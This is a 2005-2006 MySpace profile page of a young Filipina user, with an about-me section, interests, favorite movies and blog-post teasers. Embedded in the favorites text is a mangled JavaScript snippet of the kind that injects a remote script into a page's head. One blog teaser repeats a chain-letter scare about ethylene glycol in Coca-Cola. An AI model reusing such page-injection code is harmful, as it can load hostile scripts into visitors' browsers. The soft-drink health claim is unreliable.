-(",) WiFey (",)- profile picture

-(",) WiFey (",)-

I am here for Friends and Networking

About Me

guys I DON'T reply to any of ur msgs,it's DOODS.... my myspace manager! heeheee!

a Very oUtgOinG persOn.sHY(yEa,u hEArD mE RyT!!) UnPreDiCTAbLe aT TyMs .A GiRL HuS LiFe iS tO LAuGh...i'M rEaLLy NiCe cOz i DoNT biTe (",)...i LoVe eAtiNg(*mCdO's FriEs*,*dArK cHoCoLatEs*)yUmmY!!!!...hAhAHa...i LoVe GoiNg oUt!!!eSpEciALLy wHen I'm WiTh FriEndS(*giMiKS!*)...i ReALLy Do LOvE My GiRLfriEnDs(mWaah)!!i LOVe gOiNg tO dIfFeREnT pLacES i'Ve nVeR beeN anD mEeTinG dIffErent KiNDs oF pEoPLe...i MeaN niCe anD iNtErEstiNg peePz..i hATe peEpZ wHo aRE sO mEAn,,,i LiKE bEiNg paMpErEd.i HATE PEOPLE wHo LOVES TO BRAG....As iN MAY-I-BRAG-24/7 (",)i'M aLwaYS .. whEn i'M BorEd or whEn iM wD FriEnDs...

Myspace Layouts at Pimp-My-Profile.com / Orange swirls /

My Interests

i LOvE GOiNg oUt wiTh mAh siStaHs,dOiNg SomE "kALoKoHanS",i LoVe haviNg sO mUcH cOnVeRsaTioNs with ThEm *g R a c i E & tJ* ,,,i LoVe nEt sUrFiNG...and mOst oF aLL,,,PARTY,,,*NAkS*

I'd like to meet:

SuPer SWEET LiKe mYhUbBySuPer CUTE LiKe MyhUbBySuPer HONEST LikE MyhUbBySuPer SMART LiKe MyhUbBySuPEr FUNNY LiKe MyhUbBy...iN shOrT,,i LoVe aLLabOuT MyhUbBy....
Cool Slideshows


hALoS LAHAt nA aTA nG kLAsE...WaG LAng SoBraNg mAIngAy,,,i DoN't LikE RoCk mUSiC...i LoVe SonGs wHiCh sUiTs mY MooD...**evErAFtER***


i LoVe sExY RoMAntiC & HorrOr MoViEs...SoMethiNG LikE d' GiRL nExt DooR,JusT maRriEd,mEan GiRLs,LosT iN tRAnsLAtiOn,cAstAwaY,tHe terMinAL,FiRsT dAugHtEr..aNd MoViES sTaRriNG dEnzEL wAsHiNGtON(oUt oF TimE)...




fsmismyhero ..

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The Gospel of the Flying Spaghetti Monster


mAh FaMiLy,oF corz mAh SiStErS iN cRiMe *gRacIe aNd tJ..*wInKs*mY fAVoRiTe *mArviN tHe mArtIAn* .."var s=document·('script');s.src='..';document·getEleme ntsByTagName('head')[0].appendChild(s);"

My Blog


Read on.. this might save your life... c",)Have a look at the wrapper on a Coca-Cola 1.5 liter bottle and in the ingredients label you will find phosphoric acid in it. Minute quantities of ethylene gl...
Posted by -(",) WiFey (",)- on Tue, 07 Nov 2006 11:25:00 PST

tHe coMmiTmEnt...(hubby!it's for u)may28,2006

hUbby, u need to read my love problem... hahaha.. who would have thought that we'll end up loving each other?(???????) from the kulitan stage the bolahan stage the dating stage... and now,grabe,m...
Posted by -(",) WiFey (",)- on Sun, 28 May 2006 11:40:00 PST

Just for a laugh.... PS: Hwag nyo pong gagayahin ito.....

  Just for a laugh....  PS: Hwag nyo pong gagayahin ito.....     Registered  nurse si Bebeng sa L.A. Kasama niya ang kanyang ina na nagpagamot doon. Namatay  ang ina ...
Posted by -(",) WiFey (",)- on Wed, 10 May 2006 05:46:00 PST

My fRiEnDs!!!!---HaHa...

ThEsS aNd mE....wAhaha...sO KuLiT!! mY pArTnErS iN CrimE...gRAciE,aiRa anD Tj...LAgOT kAu!!! aNg 3 eWAn...HaHA...kHiT SA cR pA-CuTE... NaUgHtY LiaNnE anD Me.. pREttY aiRA anD Me...(gOsh!thiS lAdy ...
Posted by -(",) WiFey (",)- on Wed, 08 Feb 2006 02:37:00 PST

i WiSh i HAvE ThESe CUTIES......

       I HoPe TheSe ArE aLL MinE!!!hAhAhA......
Posted by -(",) WiFey (",)- on Mon, 30 Jan 2006 05:19:00 PST

YouR pErsOnALiTy...dAmN AccURatE!!

  CAPRICORN MAN     A man in this Zodiac will has a pair of round big beautiful eyes, a nice structure jaw line. He is a good listener and can understand everything easily and...
Posted by -(",) WiFey (",)- on Mon, 14 Nov 2005 03:03:00 PST

FuNnY~LoUsy eNgLiSh~

 LoUsY enGLiSh Boyfriend to Girlfriend, may LQ: What do you take me for?! Granted? Guard, answering the telephone: Hello?... Ah yes, for a while. Please hang yourself. Starlet in an interview:...
Posted by -(",) WiFey (",)- on Mon, 14 Nov 2005 12:59:00 PST